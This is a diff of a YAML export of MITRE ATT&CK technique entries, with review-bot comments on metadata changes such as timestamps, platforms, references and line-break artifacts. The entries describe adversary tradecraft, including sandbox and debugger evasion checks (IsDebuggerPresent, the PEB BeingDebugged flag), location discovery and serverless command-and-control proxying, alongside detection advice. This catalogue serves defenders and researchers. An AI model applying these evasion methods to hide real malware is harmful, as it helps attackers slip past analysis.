- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1057
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -50328,6 +50984,9 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -50338,9 +50997,14 @@ discovery:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -50350,12 +51014,39 @@ discovery:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1069.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:14:42.184Z'
name: 'Permission Groups Discovery: Local Groups'
description: |-
Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
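Review bot: the `modified` timestamp for T1069.001 moves backwards (`2023-05-09T14:00:00.188Z` to `2023-04-07T17:14:42.184Z`), and the same pattern recurs for T1012, T1614.001 and T1622 later in this diff; this suggests the export now takes the original upstream `modified` value instead of a later re-serialization date, which is fine if intentional but should be stated, since tools that sort or diff by `modified` will treat these as reverted objects. Secondary point on the Deloitte reference in T1497.002: the URL gains an `/edit` suffix and a new retrieval date; please confirm the `/edit` form resolves for unauthenticated readers, as the previous bare file link did.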
@@ -50398,12 +51089,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.001
atomic_tests: []
T1201:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:02:44.477Z'
name: Password Policy Discovery
description: |-
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -50414,28 +51104,31 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Regina Elwell
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ - Isif Ibrahima, Mandiant
+ - Austin Clark, @c2defense
+ x_mitre_deprecated: false
x_mitre_detection: Monitor logs and processes for tools and command line arguments
that may indicate they're being used for password policy discovery. Correlate
that activity with other suspicious activity from the originating system to
reduce potential false positives from valid user or administrator activity.
Adversaries will likely attempt to find the password policy early in an operation
and the activity is likely to happen with other Discovery activity.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
- IaaS
- Network
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.5'
- x_mitre_contributors:
- - Regina Elwell
- - Sudhanshu Chauhan, @Sudhanshu_C
- - Isif Ibrahima, Mandiant
- - Austin Clark, @c2defense
+ - Identity Provider
+ - SaaS
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Metadata'
- 'Command: Command Execution'
@@ -50468,9 +51161,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1201
atomic_tests: []
T1614.001:
@@ -50513,7 +51205,7 @@ discovery:
description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
the Doppelgänging technique. Retrieved May 22, 2018.
url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:00:56.174Z'
name: 'System Location Discovery: System Language Discovery'
description: "Adversaries may attempt to gather information about the system
language of a victim in order to infer the geographical location of that host.
@@ -50552,13 +51244,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614.001
atomic_tests: []
T1012:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:56:37.011Z'
name: Query Registry
description: |-
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -50599,87 +51289,85 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1012
atomic_tests: []
T1614:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:07:23.511Z'
+ name: System Location Discovery
+ description: |2-
+
+ Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+ Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Pooja Natarajan, NEC Corporation India
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Wes Hurd
- Katie Nickels, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
+
+ Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ - IaaS
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Process: OS API Execution'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
created: '2021-04-01T16:42:08.735Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1614
url: https://attack.mitre.org/techniques/T1614
- - source_name: FBI Ragnar Locker 2020
- url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
- description: FBI. (2020, November 19). Indicators of Compromise Associated
- with Ragnar Locker Ransomware. Retrieved April 1, 2021.
- - source_name: Sophos Geolocation 2016
- url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
- description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
- target you based on where you live. Retrieved April 1, 2021.'
+ external_id: T1614
- source_name: Bleepingcomputer RAT malware 2020
- url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
description: Abrams, L. (2020, October 23). New RAT malware gets commands
via Discord, has ransomware feature. Retrieved April 1, 2021.
+ url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
- source_name: AWS Instance Identity Documents
- url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
description: Amazon. (n.d.). Instance identity documents. Retrieved April
2, 2021.
- - source_name: Microsoft Azure Instance Metadata 2021
- url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
- description: Microsoft. (2021, February 21). Azure Instance Metadata Service
- (Windows). Retrieved April 2, 2021.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
- source_name: Securelist Trasparent Tribe 2020
- url: https://securelist.com/transparent-tribe-part-1/98127/
description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
part 1. Retrieved April 1, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: System Location Discovery
- description: |2-
-
- Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
- Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
-
- Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
- x_mitre_version: '1.0'
+ url: https://securelist.com/transparent-tribe-part-1/98127/
+ - source_name: FBI Ragnar Locker 2020
+ description: FBI. (2020, November 19). Indicators of Compromise Associated
+ with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+ url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+ - source_name: Microsoft Azure Instance Metadata 2021
+ description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+ (Windows). Retrieved April 2, 2021.
+ url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+ - source_name: Sophos Geolocation 2016
+ description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+ target you based on where you live. Retrieved April 1, 2021.'
+ url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Process: OS API Execution'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614
atomic_tests: []
T1518.001:
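Review bot: the T1614 description and detection text break mid-sentence after `GetLocaleInfoW` (`...such as GetLocaleInfoW` / `can also be used to determine...` and `...such as calling GetLocaleInfoW` / `to gather information.`); inside a `|`/`|2-` literal block scalar those newlines are preserved, so the rendered text carries hard line breaks in the middle of sentences. The lines are unchanged context, so this is pre-existing, most likely from inline code markup stripped during the upstream sync; consider normalizing whitespace around such tokens in the generator. Minor: the FBI Ragnar Locker reference host changes from `assets.documentcloud.org` to `s3.documentcloud.org` with a 2024 retrieval date, and `x_mitre_permissions_required` is dropped here as well.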
@@ -50732,17 +51420,16 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518.001
atomic_tests: []
T1526:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Cloud Service Discovery
description: |-
- An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+ An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
- Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+ Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
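Review bot: the updated T1526 text now says `Microsoft Graph API` but still cites `(Citation: Azure AD Graph API)`, and the `external_references` entry with that `source_name` is unchanged; either the cited source documents Microsoft Graph and the key is simply a legacy name, or the text and reference are now mismatched. Worth checking against the upstream object rather than assuming the rename is complete.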
@@ -50750,10 +51437,12 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Praetorian
- Thanabodi Phrakhun, I-SECURE
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -50762,15 +51451,16 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Enumeration'
+ - 'Logon Session: Logon Session Creation'
type: attack-pattern
id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
created: '2019-08-30T13:01:10.120Z'
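Review bot: in the T1526 block `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are inserted between `x_mitre_contributors`/`x_mitre_is_subtechnique` and `x_mitre_platforms`, whereas every other technique in this diff places them after `object_marking_refs`; the generator is evidently not emitting a stable key order, so this object will churn again on the next regeneration. The new `'Logon Session: Logon Session Creation'` data source and the platform rename (`Azure AD`, `Office 365`, `Google Workspace` to `Office Suite`, `Identity Provider`) look consistent with the other cloud techniques touched here.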
@@ -50798,9 +51488,6 @@ discovery:
url: https://github.com/RhinoSecurityLabs/pacu
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1526
atomic_tests: []
T1018:
@@ -50875,7 +51562,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1018
atomic_tests: []
T1046:
@@ -50947,7 +51633,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1046
atomic_tests: []
T1518:
@@ -50996,12 +51681,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518
atomic_tests: []
T1538:
technique:
- modified: '2024-04-19T04:25:33.300Z'
+ modified: '2024-10-15T15:51:56.279Z'
name: Cloud Service Dashboard
description: |-
An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -51022,12 +51706,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -51052,7 +51735,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1622:
technique:
@@ -51107,7 +51789,7 @@ discovery:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
@@ -51127,7 +51809,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1124:
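Review bot: T1622 keeps `x_mitre_attack_spec_version: 2.1.0` (unchanged context above) and has its `modified` date moved back to `2022-04-16T15:05:55.918Z`, while T1201 in the same diff is bumped to `3.2.0`; please confirm the upstream object really is still at 2.1.0 and this is not a mix of two snapshots. The description lines `IsDebuggerPresent()`, `and NtQueryInformationProcess()`, `, or manually checking the BeingDebugged` and `flag of the Process Environment Block (PEB)` are also split mid-sentence, the same stripped-markup artifact seen in T1614.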
@@ -51230,13 +51911,12 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1124
atomic_tests: []
resource-development:
T1583:
technique:
- modified: '2024-02-28T21:13:02.648Z'
+ modified: '2024-10-16T20:03:59.884Z'
name: Acquire Infrastructure
description: |-
Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -51247,7 +51927,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider use of services that may aid in tracking of newly
acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -51318,29 +51998,28 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.007:
technique:
- modified: '2022-10-20T21:20:22.578Z'
+ modified: '2024-07-01T20:24:16.562Z'
name: Serverless
description: |-
- Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+ Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
- Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+ Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -51364,15 +52043,18 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.007:
technique:
- modified: '2024-04-15T23:49:14.558Z'
+ modified: '2024-09-12T19:18:36.583Z'
name: Artificial Intelligence
description: |
